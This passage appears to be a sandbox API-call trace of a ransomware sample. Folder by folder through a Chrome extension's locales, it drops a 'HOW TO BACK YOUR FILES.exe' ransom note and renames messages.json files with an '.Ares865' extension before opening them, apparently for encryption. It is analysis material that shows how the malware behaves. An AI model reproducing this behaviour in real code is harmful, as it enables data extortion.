lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl" [0101.274] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.274] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.275] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.275] GetLastError () returned 0x0 [0101.275] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.275] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8279b800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4b5440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4b5440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.275] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.276] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.276] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.276] lstrlenW (lpString="messages.json") returned 13 [0101.276] lstrlenW (lpString="Ares865") returned 7 [0101.276] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.276] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.Ares865") returned 164 [0101.276] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.278] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=666) returned 1 [0101.281] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl" [0101.281] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl" [0101.281] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.281] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.281] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.282] GetLastError () returned 0x0 [0101.282] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.282] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82791bc0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4db5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4db5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.282] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.282] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.282] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.282] lstrlenW (lpString="messages.json") returned 13 [0101.282] lstrlenW (lpString="Ares865") returned 7 [0101.282] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.283] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.Ares865") returned 164 [0101.283] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.284] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=642) returned 1 [0101.288] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb" [0101.289] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb" [0101.289] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.289] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.289] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.290] GetLastError () returned 0x0 [0101.290] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.290] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82787f80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4db5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4db5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.290] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.290] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.290] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.290] lstrlenW (lpString="messages.json") returned 13 [0101.290] lstrlenW (lpString="Ares865") returned 7 [0101.290] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.290] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.Ares865") returned 164 [0101.290] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.292] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=644) returned 1 [0101.295] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv" [0101.295] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv" [0101.295] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.295] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.296] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.296] GetLastError () returned 0x0 [0101.296] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.296] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8277e340, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4db5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4db5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.296] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.296] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.296] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.296] lstrlenW (lpString="messages.json") returned 13 [0101.296] lstrlenW (lpString="Ares865") returned 7 [0101.297] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.297] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.Ares865") returned 164 [0101.297] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.298] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=699) returned 1 [0101.302] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt" [0101.302] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt" [0101.302] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.302] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.302] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.303] GetLastError () returned 0x0 [0101.303] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.303] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82776e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4db5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4db5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.303] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.303] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.303] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.303] lstrlenW (lpString="messages.json") returned 13 [0101.303] lstrlenW (lpString="Ares865") returned 7 [0101.303] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.304] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.Ares865") returned 164 [0101.304] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.305] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.305] 